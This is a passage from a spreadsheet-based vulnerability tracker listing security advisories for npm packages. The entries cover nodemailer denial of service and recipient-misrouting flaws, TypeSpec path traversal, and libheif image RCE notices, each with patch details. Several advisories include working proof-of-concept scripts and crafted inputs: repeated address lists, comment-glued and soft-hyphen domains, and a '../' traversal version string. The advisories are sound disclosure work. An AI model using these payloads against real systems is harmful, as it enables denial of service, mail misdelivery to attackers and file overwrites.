parsedAddresses.push.apply(parsedAddresses, handled);   -&gt;  100000 addresses:  ~51 ms   (≈119x faster, now linear)
```

**Measured scaling** (nodemailer 9.0.6, `'a@b.com,'.repeat(n)`):

| addresses n | input size | parse time | ratio for 2× input |
|---|---|---|---|
| 25,000  | 0.19 MB | ~0.35 s | – |
| 50,000  | 0.38 MB | ~1.4 s  | ×4.0 |
| 100,000 | 0.76 MB | ~6–8 s  | ×3.9 |
| 200,000 | 1.53 MB | ~25–30 s| ×4.1 |

Doubling the input quadruples the time — the signature of O(n²).

**Reachability.** The parser is invoked on any structured‑address header value on the normal send path (`MimeNode.setHeader('To'/'Cc'/'Bcc'/'From'/'Reply-To', value)` → `_parseAddresses` → `addressparser`, and `getEnvelope()`), so a single `transport.sendMail({ to: &lt;crafted string&gt; })` triggers it. It is also reached directly through the **exported** `require('nodemailer/lib/addressparser')`, which many applications call to validate or display user‑supplied recipient lists. Confirmed via the public API: `setHeader('To', 'a@b.com,'.repeat(80000))` + `getEnvelope()` blocks for ~3.9 s.

**Suggested fix:** accumulate in place instead of rebuilding the array each iteration, e.g. `parsedAddresses.push.apply(parsedAddresses, handled);` (or `for (const h of handled) parsedAddresses.push(h);`). Optionally cap the number of addresses / input length before parsing.

### PoC

Environment: Node.js ≥ 18 and the published `nodemailer@9.0.6`. No transport, network, or configuration required — the cost is in parsing.

`poc-dos.js`:
```js
'use strict';
const addressparser = require('nodemailer/lib/addressparser');

console.log('addresses | input size | parse time');
for (const n of [25000, 50000, 100000, 200000]) {
  const payload = 'a@b.com,'.repeat(n);        // n valid, comma-separated recipients
  const t0 = process.hrtime.bigint();
  addressparser(payload);                       // blocks synchronously
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  console.log(String(n).padStart(9) + ' | ' + (payload.length / 1048576).toFixed(2) + ' MB   | ' + ms.toFixed(0).padStart(7) + ' ms');
}
```

Run:
```
npm init -y &amp;&amp; npm install nodemailer@9.0.6
node poc-dos.js
```

Actual output (nodemailer 9.0.6):
```
addresses | input size | parse time
    25000 | 0.19 MB   |     381 ms
    50000 | 0.38 MB   |    1435 ms
   100000 | 0.76 MB   |    7949 ms
   200000 | 1.53 MB   |   25154 ms
```

Equivalent trigger through the normal send API (freezes the event loop):
```js
const nodemailer = require('nodemailer');
nodemailer.createTransport({ jsonTransport: true })
  .sendMail({ from: 'a@b.com', to: 'a@b.com,'.repeat(150000), subject: 'x', text: 'y' });
// ~15+ seconds of 100% CPU inside addressparser before anything is sent
```

### Impact

* **Who is impacted:** any service that runs Nodemailer (or the standalone `nodemailer/lib/addressparser`) on an address value that can be influenced by an untrusted party — a recipient field in a "send email / invite / share" feature, a `Reply‑To`/`From` derived from user input, a contact‑import or mailing‑list parser, or any endpoint that validates addresses with `addressparser`. No authentication, special option, or particular receiver is needed.

## Patched in 9.1.0

Three separate quadratic paths were fixed, not one:

* `addressparser` rebuilt its accumulator with `concat()` on every address ([9116da9](https://github.com/nodemailer/nodemailer/commit/9116da9)).
* The display-name merge loop directly below spliced each fragment out of the array, the same shape reached through `'a, b &lt;c@d.com&gt;,'.repeat(n)` (same commit).
* `MimeNode#_convertAddresses` checked recipient uniqueness with a linear scan per address ([7cc38af](https://github.com/nodemailer/nodemailer/commit/7cc38af), refined in [34da642](https://github.com/nodemailer/nodemailer/commit/34da642)). This was the most severe of the three and the reported proof of concept did not reach it: `'a@b.com,'.repeat(n)` is one address repeated, which dedupes to a single envelope entry. A list of *distinct* recipients cost O(n^2) here, taking ~35s for 100k even after `addressparser` was fixed.

Fixed alongside: `[].concat.apply` in `_parseAddresses` threw `RangeError: Maximum call stack size exceeded` past roughly 124k recipients, with no crafted input needed ([83b8c48](https://github.com/nodemailer/nodemailer/commit/83b8c48)).

Parsing 200k addresses now takes ~80ms instead of ~25s, and every path scales linearly. A new `maxRecipients` option (default 100000) throws rather than truncating, as a backstop.</t></is></c><c r="T1653" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-92596</t></is></c></row><row r="1654"><c r="A1654" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1654" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1654" s="5" t="inlineStr"><is><t>CVE-2026-92597</t></is></c><c r="D1654" s="5" t="inlineStr" /><c r="E1654" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1654" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1654" s="5" t="inlineStr" /><c r="H1654" s="5" t="inlineStr" /><c r="I1654" s="5" t="inlineStr" /><c r="J1654" s="5" t="inlineStr" /><c r="K1654" s="5" t="inlineStr" /><c r="L1654" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M1654" s="5" t="inlineStr"><is><t>9.1.0</t></is></c><c r="N1654" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1654" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1654" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1654" s="5" t="inlineStr" /><c r="R1654" s="5" t="inlineStr" /><c r="S1654" s="5" t="inlineStr"><is><t>### Summary

Nodemailer's email-address parser treats an **RFC 5322 comment** `( ... )` inside the domain as a point to **concatenate** the surrounding text, rather than as folding whitespace (CFWS) that **terminates** the domain. Consequently a recipient address such as `user@good-corp.com(x)evil.com` is parsed and **delivered to `good-corp.comevil.com`** (registrable domain `comevil.com`, attacker‑controlled), while a conformant RFC 5322 parser terminates the domain at the comment and reads `good-corp.com`.

An application that decides *whether it is allowed to email a recipient* by parsing/validating the recipient's domain — with a strict RFC 5322 parser (used without inspecting parse defects) or with a naive prefix/substring allow‑list — and then hands the raw address to Nodemailer for delivery, can be induced to send mail to a domain the attacker controls. This is an **Interpretation Conflict (CWE‑436)**, the same class as CVE‑2025‑13033, reached through the RFC 5322 *comment* construct (the "Comments" technique in PortSwigger's *Splitting the email atom* research, which produced a Postfix fix).

Severity is **Moderate**: exploitation requires the app's domain check to disagree with Nodemailer (see **Impact** for exactly which parsers do and do not). Verified end‑to‑end against a real RFC 5321 SMTP server (nodemailer 9.0.6 → `aiosmtpd`).

### Details

Root cause is in `lib/addressparser/index.js`.

1. The tokenizer registers the comment as an operator pair (`Tokenizer.operators`):
   ```js
   '(': ')',            // line ~331
   ```
2. When the **closing** `)` is immediately followed by a non‑break character (anything other than space / tab / CR / LF / `,` / `;`), the tokenizer marks that operator token with `noBreak = true`:
   ```js
   // Tokenizer.checkChar, lines ~398-399
   if (nextChr &amp;&amp; ![' ', '\t', '\r', '\n', ',', ';'].includes(nextChr)) {
       this.node.noBreak = true;
   }
   ```
3. `_handleAddress` then **glues** the token that follows the comment onto the token that preceded it (dropping the comment):
   ```js
   // _handleAddress, lines ~187-188
   if (prevToken &amp;&amp; prevToken.noBreak &amp;&amp; data[state].length) {
       data[state][data[state].length - 1] += token.value;   // &lt;-- concatenation
   }
   ```

For the input `user@good-corp.com(x)evil.com` the tokens are `text:"user@good-corp.com"`, `op:"("`, `text:"x"`, `op:")"` (flagged `noBreak`), `text:"evil.com"`. Step 3 appends `evil.com` onto `user@good-corp.com`, producing the single domain **`good-corp.comevil.com`**. The comment content (`x`) is discarded into the display‑name field.

RFC 5322 defines a comment as CFWS — semantically folding whitespace — and it may **not** appear inside a `dot-atom`. A comment therefore *separates* tokens and terminates the domain; the conformant reading of `good-corp.com(x)evil.com` is the domain `good-corp.com` (with the trailing `evil.com` being invalid/ignored). Nodemailer instead concatenates the two atoms across the removed comment, yielding a different, attacker‑registrable domain.

Nodemailer uses the parsed address for **both** the SMTP envelope (`getEnvelope()` → `RCPT TO`) and the emitted `To:`/`From:` headers, so the entire message is routed to the concatenated domain.

**Related grammar defect (bonus, lower impact):** nested comments are legal in RFC 5322, but the tokenizer closes the comment at the *first* `)` (`chr === this.operatorExpecting`, line ~392), so a valid nested comment such as `user@x.com(a(b)c)` is mis‑balanced and mangled to `x.comc)`. That particular output contains a stray `)` and is **rejected** by a conformant MTA (501) — a bounce/robustness issue, not a misroute.

**Suggested fix:** treat a comment as folding whitespace that terminates the current token — i.e. do **not** propagate `noBreak` across a comment‑closing `)` (restrict the `noBreak` optimization to quoted‑string closes), and support nested comments per RFC 5322. Equivalently, never emit a domain formed by concatenating two atoms that were separated only by a comment.

### PoC

Environment: Node.js ≥ 18 and the published `nodemailer@9.0.6`. No special transport configuration is required; the discrepancy is in address parsing.

`poc-comment.js`:
```js
'use strict';
const net = require('net');
const nodemailer = require('nodemailer'); // 9.0.6

const TRUSTED   = 'good-corp.com';
const RECIPIENT = 'user@good-corp.com(x)evil.com'; // RFC 5322 comment (x) between two domains

// tiny SMTP sink that prints the literal RCPT TO nodemailer transmits
const server = net.createServer(sock =&gt; {
  let buf = ''; sock.write('220 sink\r\n');
  sock.on('data', d =&gt; { buf += d; let i;
    while ((i = buf.indexOf('\r\n')) &gt;= 0) { const line = buf.slice(0, i); buf = buf.slice(i + 2);
      const u = line.toUpperCase();
      if (u.startsWith('EHLO')) sock.write('250-sink\r\n250 8BITMIME\r\n');
      else if (u.startsWith('RCPT')) { console.log('nodemailer transmits :', line); sock.write('250 ok\r\n'); }
      else if (u.startsWith('DATA')) sock.write('354 go\r\n');
      else if (line === '.') sock.write('250 ok\r\n');
      else if (u.startsWith('QUIT')) { sock.write('221 bye\r\n'); sock.end(); }
      else sock.write('250 ok\r\n'); } });
});
server.listen(0, '127.0.0.1', async () =&gt; {
  const t = nodemailer.createTransport({ host: '127.0.0.1', port: server.address().port, secure: false });
  await t.sendMail({ from: 'app@good-corp.com', to: RECIPIENT, subject: 'hi', text: 'x' });
  t.close(); server.close();
});
```

Run:
```
npm init -y &amp;&amp; npm install nodemailer@9.0.6
node poc-comment.js
```

Actual output (nodemailer 9.0.6):
```
nodemailer transmits : RCPT TO:&lt;user@good-corp.comevil.com&gt;
```

The application asked to mail `user@good-corp.com(x)evil.com`; Nodemailer delivers to `good-corp.comevil.com` — registrable domain `comevil.com`, which an attacker can register.

**Verified against a real RFC 5321 server** (containerized lab included with this report — `docker compose up --build`, case `R8_comment_glue`, receiver = `aiosmtpd`):
```
wire RCPT TO                     : RCPT TO:&lt;user@good-corp.comevil.com&gt;
real server                      : ACCEPTED (250)
recipient parsed by real server  : user@good-corp.comevil.com   (domain good-corp.comevil.com)
delivered To header              : x &lt;user@good-corp.comevil.com&gt;
```

**Which parser sees what** (the crux of exploitability):

| Parser used by the application to gate/route | Domain it reads from `user@good-corp.com(x)evil.com` | Deceived? |
|---|---|---|
| Python `email.policy.default` (strict RFC 5322) | `good-corp.com` *(flags `InvalidHeaderDefect`)* | Yes, if defects are not checked |
| Naive prefix / substring allow‑list (`startsWith`/`includes('@good-corp.com')`) | `good-corp.com` | Yes |
| Nodemailer's own `addressparser` | `good-corp.comevil.com` | No |
| Python `email.utils.getaddresses` | `good-corp.comevil.com` | No |
| WHATWG `url.domainToASCII` | `good-corp.com(x)evil.com` | No |

### Impact



* **Who is impacted:** applications that make a security or routing decision on the recipient **domain** using a parser that terminates the domain at the comment, while relying on Nodemailer for delivery — specifically those that validate with a strict RFC 5322 parser **without inspecting parse defects**, or with a **prefix/substring/allow‑list** check (e.g. "only send to `@good-corp.com`", employee‑only flows, "same‑tenant" routing). Applications that validate with Nodemailer's own `addressparser`, `email.utils.getaddresses`, or `url.domainToASCII` are **not** affected, which is why this is rated below the IDN/Punycode issue.

## Patched in 9.1.0

Fixed in [902b63e](https://github.com/nodemailer/nodemailer/commit/902b63e).

Not propagating `noBreak` across the closing `)` on its own breaks valid addresses, because CFWS is legal on either side of the `@`: `user@(x)good-corp.com` and `user(x)@good-corp.com` both come out mangled. A comment now joins what it separates only when one side carries the `@`, so those keep resolving while `user@good-corp.com(x)evil.com` terminates at `good-corp.com`.

Quoted-string and angle-address joining are unchanged. Nested comments are still not modelled, but the misroute is gone: `user@x.com(a(b)c)` now yields `user@x.com`.</t></is></c><c r="T1654" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-92597</t></is></c></row><row r="1655"><c r="A1655" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1655" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1655" s="5" t="inlineStr"><is><t>CVE-2026-92598</t></is></c><c r="D1655" s="5" t="inlineStr" /><c r="E1655" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1655" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1655" s="5" t="inlineStr" /><c r="H1655" s="5" t="inlineStr" /><c r="I1655" s="5" t="inlineStr" /><c r="J1655" s="5" t="inlineStr" /><c r="K1655" s="5" t="inlineStr" /><c r="L1655" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M1655" s="5" t="inlineStr"><is><t>9.1.0</t></is></c><c r="N1655" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1655" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1655" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1655" s="5" t="inlineStr" /><c r="R1655" s="5" t="inlineStr" /><c r="S1655" s="5" t="inlineStr"><is><t>### Summary

Nodemailer resolves an international (IDN / non-ASCII) recipient **domain** to a different Punycode `xn--` label than every UTS‑46‑conformant parser (web browsers, the WHATWG URL Standard, Node's `url.domainToASCII`, Python's `idna`). Its address normalizer (`_normalizeAddress` in `lib/mime-node/index.js`) uses the bundled **raw RFC‑3492 Punycode codec with no UTS‑46 mapping/normalization**, so a domain that a standards‑compliant validator maps to a trusted domain is delivered by Nodemailer to a **different, attacker‑registrable domain**.

An application that applies a domain allow‑list / same‑domain check to a recipient using a normal IDN‑aware parser (or that shows the normalized recipient to a user for confirmation) and then relies on Nodemailer to deliver to that domain can be induced to send email to an **unintended external domain**. This is the same weakness class as CVE‑2025‑13033 (Interpretation Conflict, CWE‑436) but reached through IDN/Punycode rather than quoted local‑parts, and it is not addressed by the 7.0.7 fix.

Because the mismatch can be triggered with an **invisible** character (U+00AD SOFT HYPHEN) that UTS‑46 folds away to the *exact* trusted domain string, no visible look‑alike/homograph is required.

### Details

`lib/mime-node/index.js` → `_normalizeAddress(address)` (around lines 1307–1346) splits the address at the last `@` and normalizes the domain like this:

```js
// lib/mime-node/index.js
try {
    if (/[\x80-￿]/.test(user)) {
        encodedDomain = punycode.toUnicode(domain.toLowerCase());   // line ~1338
    } else {
        encodedDomain = punycode.toASCII(domain.toLowerCase());     // line ~1340
    }
} catch (_err) {
    // keep domain as supplied
}
return `${this._normalizeLocalPart(user)}@${encodedDomain}`;         // line ~1346
```

`punycode` here is the project’s bundled codec (`lib/punycode/`), which is a **pure RFC 3492 (Punycode) implementation**. The only normalization applied to the domain is `.toLowerCase()`. It performs **none of the UTS‑46 “IDNA2008 + compatibility processing” steps** that browsers and DNS‑facing resolvers apply before Punycode encoding, specifically:

* removing **Ignored** code points such as `U+00AD` SOFT HYPHEN,
* **Mapping** full‑width / compatibility characters to their canonical ASCII forms,
* Unicode **NFC** normalization,
* validity checks.

As a result, for any domain containing a UTS‑46‑mapped or ‑ignored character, Nodemailer’s `punycode.toASCII(...)` produces a **different A‑label** than `url.domainToASCII(...)` (Node ≥ 7 / WHATWG), `new URL('http://'+domain)`, browsers, and Python’s `idna` (`uts46=True`). Nodemailer then uses its A‑label as:

* the SMTP envelope recipient written to the wire as `RCPT TO:&lt;local@xn--…&gt;` (`getEnvelope()` → `lib/smtp-connection/index.js` `_setEnvelope`), **and**
* the address emitted in the `To:` / `From:` headers (`_convertAddresses`).

So the domain a standards‑compliant validator computes and the domain Nodemailer actually delivers to **disagree**, on a syntactically valid, validator‑accepted address. Concrete divergences (verified on 9.0.6):

| recipient (raw) | UTS‑46 parser (`url.domainToASCII`) | Nodemailer delivers to |
|---|---|---|
| `victim@compa{U+00AD}ny.com` (invisible soft hyphen) | `company.com` | `xn--company-pka.com` |
| `victim@ｃｏｍｐａｎｙ.com` (full‑width) | `company.com` | `xn--mi7cd4afch9d.com` |
| `user@exámple.com` (NFD `a`+U+0301) | `xn--exmple-qta.com` | `xn--example-vge.com` |

This is the “Punycode / IDN parser discrepancy” technique documented in PortSwigger’s *Splitting the email atom* research (which produced e.g. Joomla CVE‑2024‑21725 and fixes in the PHP `idna_convert` library). The fix for CVE‑2025‑13033 (nodemailer 7.0.7) hardened the *quoted‑local‑part* path only; this IDN path is independent and still present in **9.0.6 (latest)** and, given the long‑standing use of the bundled RFC‑3492 codec, earlier releases.

**Suggested remediation:** perform UTS‑46 processing before/at domain encoding so Nodemailer’s resolution matches browsers, validators, and DNS — e.g. use the runtime’s `url.domainToASCII()` (available since Node 7) instead of the raw `punycode.toASCII`, and decode with the matching UTS‑46 `domainToUnicode`. At minimum, reject a domain whose value changes under UTS‑46 mapping (i.e. `punycode.toASCII(d)` ≠ `url.domainToASCII(d)`).

### PoC

Environment: Node.js ≥ 18, the published `nodemailer@9.0.6`. No special configuration; the discrepancy is in domain normalization itself.

`poc-idn.js`:

```js
'use strict';
const net = require('net');
const url = require('url');
const nodemailer = require('nodemailer'); // 9.0.6

const TRUSTED   = 'company.com';                        // the only domain the app will mail
const RECIPIENT = 'victim@compa\u00ADny.com';           // attacker input: invisible U+00AD inside "company"

// The app's domain allow-list check, done the standard (UTS-46 / browser / WHATWG) way:
const seen = url.domainToASCII(RECIPIENT.split('@').pop());
console.log('validator (url.domainToASCII) sees:', JSON.stringify(seen),
            seen === TRUSTED ? '=&gt; ALLOWED (equals trusted domain)' : '');

// A tiny SMTP sink that prints the literal RCPT TO Nodemailer transmits:
const server = net.createServer(sock =&gt; {
  let buf = ''; sock.write('220 sink\r\n');
  sock.on('data', d =&gt; { buf += d; let i;
    while ((i = buf.indexOf('\r\n')) &gt;= 0) { const line = buf.slice(0, i); buf = buf.slice(i + 2);
      const u = line.toUpperCase();
      if (u.startsWith('EHLO')) sock.write('250-sink\r\n250 8BITMIME\r\n');
      else if (u.startsWith('RCPT')) { console.log('nodemailer transmits             :', line); sock.write('250 ok\r\n'); }
      else if (u.startsWith('DATA')) sock.write('354 go\r\n');
      else if (line === '.') sock.write('250 ok\r\n');
      else if (u.startsWith('QUIT')) { sock.write('221 bye\r\n'); sock.end(); }
      else sock.write('250 ok\r\n'); } });
});
server.listen(0, '127.0.0.1', async () =&gt; {
  const t = nodemailer.createTransport({ host: '127.0.0.1', port: server.address().port, secure: false });
  await t.sendMail({ from: 'app@company.com', to: RECIPIENT, subject: 'reset your password', text: 'secret link' });
  t.close(); server.close();
});
```

Run:

```
npm init -y &amp;&amp; npm install nodemailer@9.0.6
node poc-idn.js
```

Actual output (Nodemailer 9.0.6):

```
validator (url.domainToASCII) sees: "company.com" =&gt; ALLOWED (equals trusted domain)
nodemailer transmits             : RCPT TO:&lt;victim@xn--company-pka.com&gt;
```

The application’s domain check approves `company.com`, but the message is sent to `xn--company-pka.com` — a **different domain an attacker can register** — carrying the `To:` header `&lt;victim@xn--company-pka.com&gt;` as well.

A containerized version that proves the same result against a **real RFC 5321 SMTP server** (`aiosmtpd`) is included alongside this report (`docker compose up --build`, cases `R6`/IDN); the receiving server accepts `RCPT TO:&lt;victim@xn--company-pka.com&gt;` and reports the recipient domain as `xn--company-pka.com`.

### Impact

Any application that uses Nodemailer to send mail to a recipient whose domain is subjected to a security or trust decision made with a *different* (UTS‑46‑conformant) parser, and then trusts Nodemailer to deliver to that domain. This includes:
  * recipient **allow‑list / block‑list / “same corporate domain” checks** implemented with `new URL()`, `url.domainToASCII`, a browser‑side check, or an IDN library;
  * flows that **display or log the normalized recipient domain** for human confirmation (the shown `company.com` differs from the delivered `xn--company-pka.com`);
  * any domain‑gated feature (employee‑only registration, “send only to our tenant”, notification routing).

## Patched in 9.1.0

Domain encoding now applies UTS-46 ([259c32d](https://github.com/nodemailer/nodemailer/commit/259c32d)), so `victim@compa­ny.com` resolves to `company.com`, matching `url.domainToASCII` and browsers.

One caveat on the suggested remediation, hardened in [b212ac4](https://github.com/nodemailer/nodemailer/commit/b212ac4): `url.domainToASCII` is a WHATWG **host parser**, not a pure UTS-46 mapper. It terminates the host at `/`, `\\`, `?` and `#` and percent-decodes. Used unguarded it introduces a worse version of the same weakness, since `user@attacker.example/mail.corp.example` encodes to the deliverable `user@attacker.example` where the bundled Punycode codec left it intact and unroutable. Those characters are now kept away from the mapper.

On severity, "attacker-registrable" is doing significant work in the report: `xn--company-pka.com` decodes to a label containing U+00AD and `xn--mi7cd4afch9d.com` to full-width Latin, neither of which Verisign's IDN tables permit for a .com registration. The misdelivery and the confirmation-UI mismatch stand regardless, which is why this is rated level with the comment issue rather than above it.</t></is></c><c r="T1655" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-92598</t></is></c></row><row r="1656"><c r="A1656" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1656" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1656" s="5" t="inlineStr"><is><t>GHSA-26w7-cxv4-gfx2</t></is></c><c r="D1656" s="5" t="inlineStr" /><c r="E1656" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1656" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1656" s="5" t="inlineStr" /><c r="H1656" s="5" t="inlineStr" /><c r="I1656" s="5" t="inlineStr" /><c r="J1656" s="5" t="inlineStr" /><c r="K1656" s="5" t="inlineStr" /><c r="L1656" s="5" t="inlineStr"><is><t>npm:astro</t></is></c><c r="M1656" s="5" t="inlineStr"><is><t>7.2.8</t></is></c><c r="N1656" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1656" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1656" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1656" s="5" t="inlineStr" /><c r="R1656" s="5" t="inlineStr" /><c r="S1656" s="5" t="inlineStr"><is><t>A vulnerability in `libheif`, used by the default Sharp image service in Astro, can lead to remote code execution when a malicious AVIF image is optimized.

Projects are affected when an attacker can cause Astro to process an untrusted AVIF image.

The fix was released in Astro 7.2.8, which requires Sharp 0.35.4.</t></is></c><c r="T1656" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-26w7-cxv4-gfx2</t></is></c></row><row r="1657"><c r="A1657" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1657" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1657" s="5" t="inlineStr"><is><t>GHSA-2q42-4q24-7rgv</t></is></c><c r="D1657" s="5" t="inlineStr" /><c r="E1657" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1657" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1657" s="5" t="inlineStr" /><c r="H1657" s="5" t="inlineStr" /><c r="I1657" s="5" t="inlineStr" /><c r="J1657" s="5" t="inlineStr" /><c r="K1657" s="5" t="inlineStr" /><c r="L1657" s="5" t="inlineStr"><is><t>npm:@typespec/compiler, npm:@typespec/openapi3</t></is></c><c r="M1657" s="5" t="inlineStr" /><c r="N1657" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1657" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1657" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1657" s="5" t="inlineStr" /><c r="R1657" s="5" t="inlineStr" /><c r="S1657" s="5" t="inlineStr"><is><t>### Summary

The `@typespec/openapi3` emitter retains the value of a `@versioned` enum member and interpolates it into the output filename as `{version}` without sanitizing path separators or traversal components. The completed path reaches the compiler's `emitFile()`, which creates the parent directory and writes the file without verifying containment under `emitterOutputDir`.

A crafted declarative `.tsp` input can therefore create or overwrite an OpenAPI-formatted `.yaml` or `.json` file outside the configured output tree, subject to the compiler process's filesystem permissions. No executable TypeSpec extension or attacker-controlled JavaScript is required.

### Affected version

Confirmed on:

- `@typespec/compiler` `1.15.0`
- `@typespec/openapi3` `1.15.0`
- `@typespec/http` `1.15.0`
- `@typespec/versioning` `0.85.0`
- release tag commit `f30cd352f93997e04c75d48c7ace6947a1d5d07a`

The critical `openapi.ts` and `emitter-utils.ts` blobs are unchanged on main commit `365ec52b50b82cd9e1e037de4c6fcd5de7e32e90` as checked on 2026-08-19. No patched version was identified.

### Root cause

The value originates at `packages/openapi3/src/openapi.ts:592-608`:

```ts
serviceRecord.versions.push({
  service,
  version: snapshot.version!.value,
  document: document[0],
  diagnostics: document[1],
});
```

It is interpolated without path validation at `openapi.ts:629-641`:

```ts
return interpolatePath(options.outputFile, {
  "openapi-version": specVersion,
  "service-name-if-multiple": multipleService ? getNamespaceFullName(service.type) : undefined,
  "service-name": getNamespaceFullName(service.type),
  "file-type": fileType,
  version,
});
```

The path reaches `emitFile()` at `openapi.ts:392-401`. The sink at `packages/compiler/src/core/emitter-utils.ts:29-39` performs no output-root containment check:

```ts
const outputFolder = getDirectoryPath(options.path);
await program.host.mkdirp(outputFolder);
return await program.host.writeFile(options.path, content);
```

`resolvePath()` joins the template to `emitterOutputDir` before `{version}` is interpolated, so it does not see the attacker-controlled `..` components.

### Proof of concept

The relevant input in `poc/main.tsp` is:

```tsp
@versioned(Versions) namespace Svc;
enum Versions { v1: "../../../../../../../../../../tmp/TYPESPEC_PWNED/pwn" }
```

Run from PowerShell:

```powershell
cd poc
.\run-revalidation.ps1
```

The supplied Docker runner uses a digest-pinned Node base, a committed npm integrity lock, disabled runtime networking, a benign control, a 90-second timeout, and cleanup enforcement.

Observed in the preserved identity-locked replay (`1/1` attack and `1/1` negative control):

```text
negative_before=02dc7d056c2f773e56e2c1849947888b039f127ddd630c0bd76a5d7a9ca29cbd
negative_after=02dc7d056c2f773e56e2c1849947888b039f127ddd630c0bd76a5d7a9ca29cbd
attack_before=7a8067bc04e42a025de90fd7aff9be4df59f005d192f2116eecfb107d7bffd78
attack_after=2992b399c1573c9bd2130794f8554c4026bf425861f74e78b5d89ae0324b5e38
outside_file_head=openapi: 3.0.0
inside_attack_files=
```

The benign version preserved the outside canary. The crafted version replaced it with emitted OpenAPI content, and no attack output file remained under `tsp-output`.

### Impact and constraints

Proven impact is out-of-directory YAML/JSON creation or overwrite. The attacker can influence the traversal, final basename, and many strings in the OpenAPI-structured content. The extension is constrained to the selected emitter format, content is not arbitrary bytes, and the target must be writable.

This report demonstrates file corruption. Denial of service is a potential impact when a writable critical file is targeted. It does not claim file disclosure, arbitrary-byte write, deployment takeover, or code execution by a downstream consumer.

### Suggested remediation

After every filename token has been interpolated, resolve the completed destination against `emitterOutputDir` and reject any non-descendant using path-component-aware comparison. Reject or slugify absolute paths, path separators, and traversal components in spec-derived filename tokens. Add regression cases for POSIX and Windows separators, absolute values, sibling-prefix paths, and benign semantic versions.</t></is></c><c r="T1657" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-2q42-4q24-7rgv</t></is></c></row><row r="1658"><c r="A1658" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1658" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1658" s="5" t="inlineStr"><is><t>GHSA-2xp9-vwfh-vxw4</t></is></c><c r="D1658" s="5" t="inlineStr" /><c r="E1658" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1658" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1658" s="5" t="inlineStr" /><c r="H1658" s="5" t="inlineStr" /><c r="I1658" s="5" t="inlineStr" /><c r="J1658" s="5" t="inlineStr" /><c r="K1658" s="5" t="inlineStr" /><c r="L1658" s="5" t="inlineStr"><is><t>npm:next</t></is></c><c r="M1658" s="5" t="inlineStr"><is><t>15.5.24, 16.3.3</t></is></c><c r="N1658" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1658" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1658" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1658" s="5" t="inlineStr" /><c r="R1658" s="5" t="inlineStr" /><c r="S1658" s="5" t="inlineStr"><is><t>A vulnerability in the underlying `libheif` library used by `sharp` which Next.js uses for image optimization can lead to remote code execution when AVIF files are optimized.

Until a fix has propagated, optimization of AVIF files is disabled.</t></is></c><c r="T1658" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-2xp9-vwfh-vxw4</t></is></c></row><row r="1659"><c r="A1659" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1659" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1659" s="5" t="inlineStr"><is><t>GHSA-38hw-f37p-99jj</t></is></c><c r="D1659" s="5" t="inlineStr" /><c r="E1659" s="5" t="inlineStr" /><c r="F1659" s="5" t="inlineStr" /><c r="G1659" s="5" t="inlineStr" /><c r="H1659" s="5" t="inlineStr" /><c r="I1659" s="5" t="inlineStr" /><c r="J1659" s="5" t="inlineStr" /><c r="K1659" s="5" t="inlineStr" /><c r="L1659" s="5" t="inlineStr"><is><t>npm:i18nexus</t></is></c><c r="M1659" s="5" t="inlineStr" /><c r="N1659" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1659" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1659" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1659" s="5" t="inlineStr" /><c r="R1659" s="5" t="inlineStr" /><c r="S1659" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

